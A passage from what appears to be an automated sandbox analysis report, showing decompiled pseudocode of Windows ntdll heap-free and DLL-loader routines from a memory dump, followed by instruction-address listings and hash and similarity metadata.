                                            				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                            					_v5 = _a8;
                                            					L3:
                                            					_t381 = _a4;
                                            					goto L4;
                                            				} else {
                                            					__eflags =  *(__ecx + 0x4c);
                                            					if( *(__ecx + 0x4c) != 0) {
                                            						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                            						 *_t419 = _t411;
                                            						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                            						__eflags = _t411 >> 0x18 - _t378;
                                            						if(__eflags != 0) {
                                            							_push(_t378);
                                            							E0109FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                            						}
                                            					}
                                            					_t250 = _a8;
                                            					_v5 = _t250;
                                            					__eflags = _t250;
                                            					if(_t250 != 0) {
                                            						_t400 = _t414[6];
                                            						_t53 =  &(_t414[4]); // -16
                                            						_t348 = _t53;
                                            						_t251 =  *_t348;
                                            						_v12 = _t251;
                                            						_v16 = _t400;
                                            						_t252 =  *((intOrPtr*)(_t251 + 4));
                                            						__eflags =  *_t400 - _t252;
                                            						if( *_t400 != _t252) {
                                            							L49:
                                            							_push(_t348);
                                            							_push( *_t400);
                                            							E010AA80D(_t307, 0xd, _t348, _t252);
                                            							L50:
                                            							_v5 = 0;
                                            							goto L11;
                                            						}
                                            						__eflags =  *_t400 - _t348;
                                            						if( *_t400 != _t348) {
                                            							goto L49;
                                            						}
                                            						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                            						_t407 =  *(_t307 + 0xb4);
                                            						__eflags = _t407;
                                            						if(_t407 == 0) {
                                            							L36:
                                            							_t364 = _v16;
                                            							_t282 = _v12;
                                            							 *_t364 = _t282;
                                            							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                            							__eflags = _t414[1] & 0x00000008;
                                            							if((_t414[1] & 0x00000008) == 0) {
                                            								L39:
                                            								_t365 = _t414[1];
                                            								__eflags = _t365 & 0x00000004;
                                            								if((_t365 & 0x00000004) != 0) {
                                            									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                            									_v12 = _t284;
                                            									__eflags = _t365 & 0x00000002;
                                            									if((_t365 & 0x00000002) != 0) {
                                            										__eflags = _t284 - 4;
                                            										if(_t284 > 4) {
                                            											_t284 = _t284 - 4;
                                            											__eflags = _t284;
                                            											_v12 = _t284;
                                            										}
                                            									}
                                            									_t78 =  &(_t414[8]); // -8
                                            									_t286 = E0103D540(_t78, _t284, 0xfeeefeee);
                                            									_v16 = _t286;
                                            									__eflags = _t286 - _v12;
                                            									if(_t286 != _v12) {
                                            										_t366 =  *[fs:0x30];
                                            										__eflags =  *(_t366 + 0xc);
                                            										if( *(_t366 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E00FEB150();
                                            										} else {
                                            											E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push(_v16 + 0x10 + _t414);
                                            										E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                            										_t292 =  *[fs:0x30];
                                            										_t421 = _t421 + 0xc;
                                            										__eflags =  *((char*)(_t292 + 2));
                                            										if( *((char*)(_t292 + 2)) != 0) {
                                            											 *0x10d6378 = 1;
                                            											asm("int3");
                                            											 *0x10d6378 = 0;
                                            										}
                                            									}
                                            								}
                                            								goto L50;
                                            							}
                                            							_t296 = E0100A229(_t307, _t414);
                                            							__eflags = _t296;
                                            							if(_t296 != 0) {
                                            								goto L39;
                                            							} else {
                                            								E0100A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                            								goto L50;
                                            							}
                                            						} else {
                                            							_t373 =  *_t414 & 0x0000ffff;
                                            							while(1) {
                                            								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                            								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                            									_t301 = _t373;
                                            									break;
                                            								}
                                            								_t299 =  *_t407;
                                            								__eflags = _t299;
                                            								if(_t299 == 0) {
                                            									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                            									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                            									break;
                                            								} else {
                                            									_t407 = _t299;
                                            									continue;
                                            								}
                                            							}
                                            							_t62 =  &(_t414[4]); // -16
                                            							E0100BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                            							goto L36;
                                            						}
                                            					}
                                            					L11:
                                            					_t402 = _t419[6];
                                            					_t25 =  &(_t419[4]); // -16
                                            					_t350 = _t25;
                                            					_t254 =  *_t350;
                                            					_v12 = _t254;
                                            					_v20 = _t402;
                                            					_t255 =  *((intOrPtr*)(_t254 + 4));
                                            					__eflags =  *_t402 - _t255;
                                            					if( *_t402 != _t255) {
                                            						L61:
                                            						_push(_t350);
                                            						_push( *_t402);
                                            						E010AA80D(_t307, 0xd, _t350, _t255);
                                            						goto L3;
                                            					}
                                            					__eflags =  *_t402 - _t350;
                                            					if( *_t402 != _t350) {
                                            						goto L61;
                                            					}
                                            					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                            					_t404 =  *(_t307 + 0xb4);
                                            					__eflags = _t404;
                                            					if(_t404 == 0) {
                                            						L20:
                                            						_t352 = _v20;
                                            						_t258 = _v12;
                                            						 *_t352 = _t258;
                                            						 *(_t258 + 4) = _t352;
                                            						__eflags = _t419[1] & 0x00000008;
                                            						if((_t419[1] & 0x00000008) != 0) {
                                            							_t259 = E0100A229(_t307, _t419);
                                            							__eflags = _t259;
                                            							if(_t259 != 0) {
                                            								goto L21;
                                            							} else {
                                            								E0100A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                            								goto L3;
                                            							}
                                            						}
                                            						L21:
                                            						_t354 = _t419[1];
                                            						__eflags = _t354 & 0x00000004;
                                            						if((_t354 & 0x00000004) != 0) {
                                            							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                            							__eflags = _t354 & 0x00000002;
                                            							if((_t354 & 0x00000002) != 0) {
                                            								__eflags = _t415 - 4;
                                            								if(_t415 > 4) {
                                            									_t415 = _t415 - 4;
                                            									__eflags = _t415;
                                            								}
                                            							}
                                            							_t91 =  &(_t419[8]); // -8
                                            							_t262 = E0103D540(_t91, _t415, 0xfeeefeee);
                                            							_v20 = _t262;
                                            							__eflags = _t262 - _t415;
                                            							if(_t262 != _t415) {
                                            								_t357 =  *[fs:0x30];
                                            								__eflags =  *(_t357 + 0xc);
                                            								if( *(_t357 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E00FEB150();
                                            								} else {
                                            									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(_v20 + 0x10 + _t419);
                                            								E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                            								_t271 =  *[fs:0x30];
                                            								_t421 = _t421 + 0xc;
                                            								__eflags =  *((char*)(_t271 + 2));
                                            								if( *((char*)(_t271 + 2)) != 0) {
                                            									 *0x10d6378 = 1;
                                            									asm("int3");
                                            									 *0x10d6378 = 0;
                                            								}
                                            							}
                                            						}
                                            						_t381 = _a4;
                                            						_t414 = _t419;
                                            						_t419[1] = 0;
                                            						_t419[3] = 0;
                                            						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                            						 *_t419 =  *_t381;
                                            						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                            						L4:
                                            						_t420 = _t414 +  *_t381 * 8;
                                            						if( *(_t307 + 0x4c) == 0) {
                                            							L6:
                                            							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                            								__eflags =  *(_t307 + 0x4c);
                                            								if( *(_t307 + 0x4c) != 0) {
                                            									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                            									 *_t420 = _t390;
                                            									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                            									__eflags = _t390 >> 0x18 - _t328;
                                            									if(__eflags != 0) {
                                            										_push(_t328);
                                            										E0109FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                            									}
                                            								}
                                            								__eflags = _v5;
                                            								if(_v5 == 0) {
                                            									L94:
                                            									_t382 = _t420[3];
                                            									_t137 =  &(_t420[2]); // -16
                                            									_t309 = _t137;
                                            									_t186 =  *_t309;
                                            									_v20 = _t186;
                                            									_v16 = _t382;
                                            									_t187 =  *((intOrPtr*)(_t186 + 4));
                                            									__eflags =  *_t382 - _t187;
                                            									if( *_t382 != _t187) {
                                            										L63:
                                            										_push(_t309);
                                            										_push( *_t382);
                                            										_push(_t187);
                                            										_push(_t309);
                                            										_push(0xd);
                                            										L64:
                                            										E010AA80D(_t307);
                                            										continue;
                                            									}
                                            									__eflags =  *_t382 - _t309;
                                            									if( *_t382 != _t309) {
                                            										goto L63;
                                            									}
                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                            									_t393 =  *(_t307 + 0xb4);
                                            									__eflags = _t393;
                                            									if(_t393 == 0) {
                                            										L104:
                                            										_t330 = _v16;
                                            										_t190 = _v20;
                                            										 *_t330 = _t190;
                                            										 *(_t190 + 4) = _t330;
                                            										__eflags = _t420[0] & 0x00000008;
                                            										if((_t420[0] & 0x00000008) == 0) {
                                            											L107:
                                            											_t331 = _t420[0];
                                            											__eflags = _t331 & 0x00000004;
                                            											if((_t331 & 0x00000004) != 0) {
                                            												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                            												_v12 = _t196;
                                            												__eflags = _t331 & 0x00000002;
                                            												if((_t331 & 0x00000002) != 0) {
                                            													__eflags = _t196 - 4;
                                            													if(_t196 > 4) {
                                            														_t196 = _t196 - 4;
                                            														__eflags = _t196;
                                            														_v12 = _t196;
                                            													}
                                            												}
                                            												_t162 =  &(_t420[4]); // -8
                                            												_t197 = E0103D540(_t162, _t196, 0xfeeefeee);
                                            												_v20 = _t197;
                                            												__eflags = _t197 - _v12;
                                            												if(_t197 != _v12) {
                                            													_t335 =  *[fs:0x30];
                                            													__eflags =  *(_t335 + 0xc);
                                            													if( *(_t335 + 0xc) == 0) {
                                            														_push("HEAP: ");
                                            														E00FEB150();
                                            													} else {
                                            														E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            													}
                                            													_push(_v20 + 0x10 + _t420);
                                            													E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                            													_t203 =  *[fs:0x30];
                                            													__eflags =  *((char*)(_t203 + 2));
                                            													if( *((char*)(_t203 + 2)) != 0) {
                                            														 *0x10d6378 = 1;
                                            														asm("int3");
                                            														 *0x10d6378 = 0;
                                            													}
                                            												}
                                            											}
                                            											_t394 = _a4;
                                            											_t414[1] = 0;
                                            											_t414[3] = 0;
                                            											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                            											 *_t414 =  *_t394;
                                            											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                            											break;
                                            										}
                                            										_t207 = E0100A229(_t307, _t420);
                                            										__eflags = _t207;
                                            										if(_t207 != 0) {
                                            											goto L107;
                                            										}
                                            										E0100A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                            										continue;
                                            									}
                                            									_t342 =  *_t420 & 0x0000ffff;
                                            									while(1) {
                                            										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                            										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                            											break;
                                            										}
                                            										_t210 =  *_t393;
                                            										__eflags = _t210;
                                            										if(_t210 == 0) {
                                            											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                            											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                            											L103:
                                            											_t146 =  &(_t420[2]); // -16
                                            											E0100BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                            											goto L104;
                                            										}
                                            										_t393 = _t210;
                                            									}
                                            									_t212 = _t342;
                                            									goto L103;
                                            								} else {
                                            									_t384 = _t414[6];
                                            									_t102 =  &(_t414[4]); // -16
                                            									_t311 = _t102;
                                            									_t215 =  *_t311;
                                            									_v20 = _t215;
                                            									_v16 = _t384;
                                            									_t216 =  *((intOrPtr*)(_t215 + 4));
                                            									__eflags =  *_t384 - _t216;
                                            									if( *_t384 != _t216) {
                                            										L92:
                                            										_push(_t311);
                                            										_push( *_t384);
                                            										E010AA80D(_t307, 0xd, _t311, _t216);
                                            										L93:
                                            										_v5 = 0;
                                            										goto L94;
                                            									}
                                            									__eflags =  *_t384 - _t311;
                                            									if( *_t384 != _t311) {
                                            										goto L92;
                                            									}
                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                            									_t386 =  *(_t307 + 0xb4);
                                            									__eflags = _t386;
                                            									if(_t386 == 0) {
                                            										L79:
                                            										_t313 = _v16;
                                            										_t219 = _v20;
                                            										 *_t313 = _t219;
                                            										 *(_t219 + 4) = _t313;
                                            										__eflags = _t414[1] & 0x00000008;
                                            										if((_t414[1] & 0x00000008) == 0) {
                                            											L82:
                                            											_t314 = _t414[1];
                                            											__eflags = _t314 & 0x00000004;
                                            											if((_t314 & 0x00000004) != 0) {
                                            												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                            												_v12 = _t221;
                                            												__eflags = _t314 & 0x00000002;
                                            												if((_t314 & 0x00000002) != 0) {
                                            													__eflags = _t221 - 4;
                                            													if(_t221 > 4) {
                                            														_t221 = _t221 - 4;
                                            														__eflags = _t221;
                                            														_v12 = _t221;
                                            													}
                                            												}
                                            												_t127 =  &(_t414[8]); // -8
                                            												_t222 = E0103D540(_t127, _t221, 0xfeeefeee);
                                            												_v20 = _t222;
                                            												__eflags = _t222 - _v12;
                                            												if(_t222 != _v12) {
                                            													_t316 =  *[fs:0x30];
                                            													__eflags =  *(_t316 + 0xc);
                                            													if( *(_t316 + 0xc) == 0) {
                                            														_push("HEAP: ");
                                            														E00FEB150();
                                            													} else {
                                            														E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            													}
                                            													_push(_v20 + 0x10 + _t414);
                                            													E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                            													_t228 =  *[fs:0x30];
                                            													_t421 = _t421 + 0xc;
                                            													__eflags =  *((char*)(_t228 + 2));
                                            													if( *((char*)(_t228 + 2)) != 0) {
                                            														 *0x10d6378 = 1;
                                            														asm("int3");
                                            														 *0x10d6378 = 0;
                                            													}
                                            												}
                                            											}
                                            											goto L93;
                                            										}
                                            										_t232 = E0100A229(_t307, _t414);
                                            										__eflags = _t232;
                                            										if(_t232 != 0) {
                                            											goto L82;
                                            										}
                                            										E0100A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                            										goto L93;
                                            									}
                                            									_t323 =  *_t414 & 0x0000ffff;
                                            									while(1) {
                                            										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                            										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                            											break;
                                            										}
                                            										_t235 =  *_t386;
                                            										__eflags = _t235;
                                            										if(_t235 == 0) {
                                            											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                            											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                            											L78:
                                            											_t111 =  &(_t414[4]); // -16
                                            											E0100BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                            											goto L79;
                                            										}
                                            										_t386 = _t235;
                                            									}
                                            									_t237 = _t323;
                                            									goto L78;
                                            								}
                                            							}
                                            							return _t414;
                                            						}
                                            						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                            						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                            						if(_t398 >> 0x18 != _t347) {
                                            							_push(_t347);
                                            							_push(0);
                                            							_push(0);
                                            							_push(_t420);
                                            							_push(3);
                                            							goto L64;
                                            						}
                                            						goto L6;
                                            					} else {
                                            						_t277 =  *_t419 & 0x0000ffff;
                                            						_v16 = _t277;
                                            						while(1) {
                                            							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                            							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                            								break;
                                            							}
                                            							_t279 =  *_t404;
                                            							__eflags = _t279;
                                            							if(_t279 == 0) {
                                            								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                            								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                            								break;
                                            							} else {
                                            								_t404 = _t279;
                                            								_t277 =  *_t419 & 0x0000ffff;
                                            								continue;
                                            							}
                                            						}
                                            						E0100BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                            						goto L20;
                                            					}
                                            				}
                                            			}




















































































                                            0x01051826
                                            0x01051829
                                            0x0105182c
                                            0x0105182e
                                            0x01051688
                                            0x01051688
                                            0x01051689
                                            0x0105168b
                                            0x0105168c
                                            0x0105168d
                                            0x0105168f
                                            0x01051692
                                            0x00000000
                                            0x01051692
                                            0x01051834
                                            0x01051836
                                            0x00000000
                                            0x00000000
                                            0x0105183f
                                            0x01051842
                                            0x01051848
                                            0x0105184a
                                            0x01051875
                                            0x01051875
                                            0x01051878
                                            0x0105187b
                                            0x0105187d
                                            0x01051880
                                            0x01051884
                                            0x010518a7
                                            0x010518a7
                                            0x010518aa
                                            0x010518ad
                                            0x010518b6
                                            0x010518bd
                                            0x010518c0
                                            0x010518c3
                                            0x010518c5
                                            0x010518c8
                                            0x010518ca
                                            0x010518ca
                                            0x010518cd
                                            0x010518cd
                                            0x010518c8
                                            0x010518d5
                                            0x010518da
                                            0x010518df
                                            0x010518e2
                                            0x010518e5
                                            0x010518e7
                                            0x010518ee
                                            0x010518f2
                                            0x01051912
                                            0x01051917
                                            0x010518f4
                                            0x0105190a
                                            0x0105190f
                                            0x01051925
                                            0x0105192c
                                            0x01051931
                                            0x0105193a
                                            0x0105193e
                                            0x01051940
                                            0x01051947
                                            0x01051948
                                            0x01051948
                                            0x0105193e
                                            0x010518e5
                                            0x0105194f
                                            0x01051952
                                            0x01051956
                                            0x0105195d
                                            0x01051961
                                            0x0105196d
                                            0x00000000
                                            0x0105196d
                                            0x0105188a
                                            0x0105188f
                                            0x01051891
                                            0x00000000
                                            0x00000000
                                            0x0105189d
                                            0x00000000
                                            0x0105189d
                                            0x0105184c
                                            0x01051859
                                            0x01051859
                                            0x0105185c
                                            0x00000000
                                            0x00000000
                                            0x01051851
                                            0x01051853
                                            0x01051855
                                            0x01051865
                                            0x01051865
                                            0x01051866
                                            0x01051868
                                            0x01051870
                                            0x00000000
                                            0x01051870
                                            0x01051857
                                            0x01051857
                                            0x0105185e
                                            0x00000000
                                            0x010516d2
                                            0x010516d2
                                            0x010516d5
                                            0x010516d5
                                            0x010516d8
                                            0x010516da
                                            0x010516dd
                                            0x010516e0
                                            0x010516e3
                                            0x010516e5
                                            0x01051808
                                            0x01051808
                                            0x01051809
                                            0x01051812
                                            0x01051817
                                            0x01051817
                                            0x00000000
                                            0x01051817
                                            0x010516eb
                                            0x010516ed
                                            0x00000000
                                            0x00000000
                                            0x010516f6
                                            0x010516f9
                                            0x010516ff
                                            0x01051701
                                            0x0105172c
                                            0x0105172c
                                            0x0105172f
                                            0x01051732
                                            0x01051734
                                            0x01051737
                                            0x0105173b
                                            0x0105175e
                                            0x0105175e
                                            0x01051761
                                            0x01051764
                                            0x0105176d
                                            0x01051774
                                            0x01051777
                                            0x0105177a
                                            0x0105177c
                                            0x0105177f
                                            0x01051781
                                            0x01051781
                                            0x01051784
                                            0x01051784
                                            0x0105177f
                                            0x0105178c
                                            0x01051791
                                            0x01051796
                                            0x01051799
                                            0x0105179c
                                            0x0105179e
                                            0x010517a5
                                            0x010517a9
                                            0x010517c9
                                            0x010517ce
                                            0x010517ab
                                            0x010517c1
                                            0x010517c6
                                            0x010517dc
                                            0x010517e3
                                            0x010517e8
                                            0x010517ee
                                            0x010517f1
                                            0x010517f5
                                            0x010517f7
                                            0x010517fe
                                            0x010517ff
                                            0x010517ff
                                            0x010517f5
                                            0x0105179c
                                            0x00000000
                                            0x01051764
                                            0x01051741
                                            0x01051746
                                            0x01051748
                                            0x00000000
                                            0x00000000
                                            0x01051754
                                            0x00000000
                                            0x01051754
                                            0x01051703
                                            0x01051710
                                            0x01051710
                                            0x01051713
                                            0x00000000
                                            0x00000000
                                            0x01051708
                                            0x0105170a
                                            0x0105170c
                                            0x0105171c
                                            0x0105171c
                                            0x0105171d
                                            0x0105171f
                                            0x01051727
                                            0x00000000
                                            0x01051727
                                            0x0105170e
                                            0x0105170e
                                            0x01051715
                                            0x00000000
                                            0x01051715
                                            0x010516cc
                                            0x01009a45
                                            0x01009a45
                                            0x01009a0e
                                            0x01009a1c
                                            0x01009a23
                                            0x0105167e
                                            0x0105167f
                                            0x01051681
                                            0x01051683
                                            0x01051684
                                            0x00000000
                                            0x01051684
                                            0x00000000
                                            0x01009aad
                                            0x01009aad
                                            0x01009ab0
                                            0x01009ab3
                                            0x01009ab3
                                            0x01009ab6
                                            0x00000000
                                            0x00000000
                                            0x01009ab8
                                            0x01009aba
                                            0x01009abc
                                            0x01009ac8
                                            0x01009ac8
                                            0x00000000
                                            0x01009abe
                                            0x01009abe
                                            0x01009ac0
                                            0x00000000
                                            0x01009ac0
                                            0x01009abc
                                            0x01009ad2
                                            0x00000000
                                            0x01009ad2
                                            0x01009aab

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 507452b0656418f826063af069b2336976d036e2967760ac1459e3d737974bb2
                                            • Instruction ID: 3320a0d0f79d7d1743f8b9062149413d1dfac5c0e0d160ae06530ac033491cc7
                                            • Opcode Fuzzy Hash: 507452b0656418f826063af069b2336976d036e2967760ac1459e3d737974bb2
                                            • Instruction Fuzzy Hash: 7522EF706002469FEBA5DF2CC895B7BBBF5EF45704F1885A9E8C68B282D735D881CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00FF8794(void* __ecx) {
                                            				signed int _v0;
                                            				char _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v40;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t77;
                                            				signed int _t80;
                                            				signed char _t81;
                                            				signed int _t87;
                                            				signed int _t91;
                                            				void* _t92;
                                            				void* _t94;
                                            				signed int _t95;
                                            				signed int _t103;
                                            				signed int _t105;
                                            				signed int _t110;
                                            				signed int _t118;
                                            				intOrPtr* _t121;
                                            				intOrPtr _t122;
                                            				signed int _t125;
                                            				signed int _t129;
                                            				signed int _t131;
                                            				signed int _t134;
                                            				signed int _t136;
                                            				signed int _t143;
                                            				signed int* _t147;
                                            				signed int _t151;
                                            				void* _t153;
                                            				signed int* _t157;
                                            				signed int _t159;
                                            				signed int _t161;
                                            				signed int _t166;
                                            				signed int _t168;
                                            
                                            				_push(__ecx);
                                            				_t153 = __ecx;
                                            				_t159 = 0;
                                            				_t121 = __ecx + 0x3c;
                                            				if( *_t121 == 0) {
                                            					L2:
                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                            							L6:
                                            							if(E00FF934A() != 0) {
                                            								_t159 = E0106A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                            								__eflags = _t159;
                                            								if(_t159 < 0) {
                                            									_t81 =  *0x10d5780; // 0x0
                                            									__eflags = _t81 & 0x00000003;
                                            									if((_t81 & 0x00000003) != 0) {
                                            										_push(_t159);
                                            										E01065510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                            										_t81 =  *0x10d5780; // 0x0
                                            									}
                                            									__eflags = _t81 & 0x00000010;
                                            									if((_t81 & 0x00000010) != 0) {
                                            										asm("int3");
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							_t159 = E00FF849B(0, _t122, _t153, _t159, _t180);
                                            							if(_t159 >= 0) {
                                            								goto L6;
                                            							}
                                            						}
                                            						_t80 = _t159;
                                            						goto L8;
                                            					} else {
                                            						_t125 = 0x13;
                                            						asm("int 0x29");
                                            						_push(0);
                                            						_push(_t159);
                                            						_t161 = _t125;
                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                            						_t143 = 0;
                                            						_v40 = _t161;
                                            						_t118 = 0;
                                            						_push(_t153);
                                            						__eflags = _t87;
                                            						if(_t87 != 0) {
                                            							_t118 = _t87 + 0x5d8;
                                            							__eflags = _t118;
                                            							if(_t118 == 0) {
                                            								L46:
                                            								_t118 = 0;
                                            							} else {
                                            								__eflags =  *(_t118 + 0x30);
                                            								if( *(_t118 + 0x30) == 0) {
                                            									goto L46;
                                            								}
                                            							}
                                            						}
                                            						_v32 = 0;
                                            						_v28 = 0;
                                            						_v16 = 0;
                                            						_v20 = 0;
                                            						_v12 = 0;
                                            						__eflags = _t118;
                                            						if(_t118 != 0) {
                                            							__eflags = _t161;
                                            							if(_t161 != 0) {
                                            								__eflags =  *(_t118 + 8);
                                            								if( *(_t118 + 8) == 0) {
                                            									L22:
                                            									_t143 = 1;
                                            									__eflags = 1;
                                            								} else {
                                            									_t19 = _t118 + 0x40; // 0x40
                                            									_t156 = _t19;
                                            									E00FF8999(_t19,  &_v16);
                                            									__eflags = _v0;
                                            									if(_v0 != 0) {
                                            										__eflags = _v0 - 1;
                                            										if(_v0 != 1) {
                                            											goto L22;
                                            										} else {
                                            											_t128 =  *(_t161 + 0x64);
                                            											__eflags =  *(_t161 + 0x64);
                                            											if( *(_t161 + 0x64) == 0) {
                                            												goto L22;
                                            											} else {
                                            												E00FF8999(_t128,  &_v12);
                                            												_t147 = _v12;
                                            												_t91 = 0;
                                            												__eflags = 0;
                                            												_t129 =  *_t147;
                                            												while(1) {
                                            													__eflags =  *((intOrPtr*)(0x10d5c60 + _t91 * 8)) - _t129;
                                            													if( *((intOrPtr*)(0x10d5c60 + _t91 * 8)) == _t129) {
                                            														break;
                                            													}
                                            													_t91 = _t91 + 1;
                                            													__eflags = _t91 - 5;
                                            													if(_t91 < 5) {
                                            														continue;
                                            													} else {
                                            														_t131 = 0;
                                            														__eflags = 0;
                                            													}
                                            													L37:
                                            													__eflags = _t131;
                                            													if(_t131 != 0) {
                                            														goto L22;
                                            													} else {
                                            														__eflags = _v16 - _t147;
                                            														if(_v16 != _t147) {
                                            															goto L22;
                                            														} else {
                                            															E01002280(_t92, 0x10d86cc);
                                            															_t94 = E010B9DFB( &_v20);
                                            															__eflags = _t94 - 1;
                                            															if(_t94 != 1) {
                                            															}
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															_t95 = E010161A0( &_v32);
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t71 = _t118 + 0x40; // 0x3f
                                            																	_t134 = _t71;
                                            																	goto L55;
                                            																}
                                            															}
                                            															goto L30;
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												_t92 = 0x10d5c64 + _t91 * 8;
                                            												asm("lock xadd [eax], ecx");
                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                            												goto L37;
                                            											}
                                            										}
                                            										goto L56;
                                            									} else {
                                            										_t143 = E00FF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                            										__eflags = _t143;
                                            										if(_t143 != 0) {
                                            											_t157 = _v12;
                                            											_t103 = 0;
                                            											__eflags = 0;
                                            											_t136 =  &(_t157[1]);
                                            											 *(_t161 + 0x64) = _t136;
                                            											_t151 =  *_t157;
                                            											_v20 = _t136;
                                            											while(1) {
                                            												__eflags =  *((intOrPtr*)(0x10d5c60 + _t103 * 8)) - _t151;
                                            												if( *((intOrPtr*)(0x10d5c60 + _t103 * 8)) == _t151) {
                                            													break;
                                            												}
                                            												_t103 = _t103 + 1;
                                            												__eflags = _t103 - 5;
                                            												if(_t103 < 5) {
                                            													continue;
                                            												}
                                            												L21:
                                            												_t105 = E0102F380(_t136, 0xfc1184, 0x10);
                                            												__eflags = _t105;
